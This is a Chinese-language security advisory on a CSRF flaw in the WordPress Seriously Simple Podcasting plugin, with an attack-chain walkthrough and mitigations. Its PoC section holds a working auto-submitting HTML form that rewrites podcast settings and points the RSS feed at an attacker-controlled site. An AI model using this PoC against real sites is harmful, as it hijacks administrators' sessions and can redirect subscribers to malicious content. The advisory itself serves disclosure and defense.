CVE-2025-66061 WordPress Seriously Simple Podcasting插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-66061

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Seriously Simple Podcasting插件（seriously-simple-podcasting）

漏洞概述

CVE-2025-66061是WordPress插件Seriously Simple Podcasting中的一个中危跨站请求伪造（CSRF）漏洞。该插件由Craig Hewitt开发，用于管理播客内容。漏洞存在于插件的设置页面和状态更改操作中，由于缺少适当的CSRF令牌验证，攻击者可以诱导已登录的管理员用户在不知情的情况下执行非预期的操作。攻击者通过构造恶意网页或链接，利用社会工程学手段诱骗管理员点击，当管理员在登录状态下访问恶意内容时，浏览器会自动向目标网站发送已认证的请求，从而触发漏洞。成功利用此漏洞可能导致播客设置被篡改、RSS feed配置被修改、播放列表被恶意更新等风险。CVSS 3.1评分4.3，属于中等严重程度，攻击复杂度低但需要用户交互，且对机密性和可用性影响较低但对完整性有一定影响。建议受影响用户尽快升级到最新版本或实施CSRF防护措施。

技术细节

该CSRF漏洞源于Seriously Simple Podcasting插件在处理管理操作时未能正确实现CSRF防护机制。具体而言，插件的AJAX端点和管理表单操作缺少必要的nonce令牌验证。在WordPress插件开发中，wp_verify_nonce()函数用于验证请求的合法性，而该插件在关键操作（如更新设置、保存播客信息、修改RSS配置等）时未调用此验证或验证不严格。攻击者可以构造一个包含自动提交表单的HTML页面，当管理员用户访问时，浏览器会自动发送带有有效认证Cookie的请求到目标WordPress站点。由于浏览器会自动携带用户的认证凭证，服务器无法区分这是合法用户操作还是攻击者诱导的请求。攻击者可利用此漏洞修改插件设置、添加或删除播客剧集、变更订阅链接等。防御措施包括：在所有状态变更操作中添加wp_verify_nonce()验证、使用SameSite=Strict/Lax Cookie属性、以及实现Referer检查等。

攻击链分析

STEP 1

步骤1

攻击者创建恶意HTML页面，包含自动提交的表单或图片标签，指向目标WordPress站点的AJAX端点

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱导已登录的管理员用户访问该恶意页面

STEP 3

步骤3

管理员浏览器自动向目标站点发送HTTP请求，携带有效的认证Cookie

STEP 4

步骤4

目标服务器处理请求，由于插件缺少CSRF验证，无法识别这是攻击者诱导的请求

STEP 5

步骤5

攻击者的恶意参数被插件执行，导致播客设置被篡改（如修改标题、描述、RSS链接等）

STEP 6

步骤6

攻击者可能利用篡改后的RSS feed将订阅者重定向到恶意内容，实施进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-66061 -->
<!-- This PoC demonstrates how an attacker can trick an authenticated admin -->
<!-- into modifying Seriously Simple Podcasting settings without their knowledge -->

<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-66061</title>
</head>
<body>
    <h1>CSRF PoC for Seriously Simple Podcasting Plugin</h1>
    <p>If the admin visits this page while logged in, their podcast settings will be modified.</p>
    
    <form action="http://target-site/wp-admin/admin-ajax.php" method="POST" id="csrf-form">
        <!-- Required nonce verification is missing in vulnerable version -->
        <input type="hidden" name="action" value="ssp_settings">
        <input type="hidden" name="podcast_title" value="Malicious Podcast Title - Hacked">
        <input type="hidden" name="podcast_description" value="This site has been compromised via CSRF">
        <input type="hidden" name="rss_feed_url" value="https://attacker-controlled-site.com/feed.xml">
        <input type="hidden" name="submit" value="Save Settings">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrf-form').submit();
        console.log('CSRF request sent successfully');
    </script>
    
    <!-- Alternative: Image tag-based request (older technique) -->
    <!-- <img src="http://target-site/wp-admin/admin-ajax.php?action=ssp_settings&podcast_title=Hacked" width="0" height="0"> -->
</body>
</html>

<!-- Mitigation: Add nonce verification in plugin code -->
<!-- Example fix in PHP: -->
<!-- if (!wp_verify_nonce($_POST['nonce'], 'ssp_settings_nonce')) { -->
<!--     wp_die('Security check failed'); -->
<!-- } -->

影响范围

Seriously Simple Podcasting <= 3.13.0

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）禁用或删除Seriously Simple Podcasting插件直到修复版本可用；2）限制管理员账户的使用，避免从不受信任的网络访问WordPress后台；3）使用浏览器安全插件防止自动提交表单；4）启用Web应用防火墙（WAF）规则检测异常请求模式；5）监控服务器日志关注异常的admin-ajax.php请求；6）教育管理员用户不要点击来源不明的链接。但最有效的解决方案仍是尽快升级到插件官方发布的安全修复版本。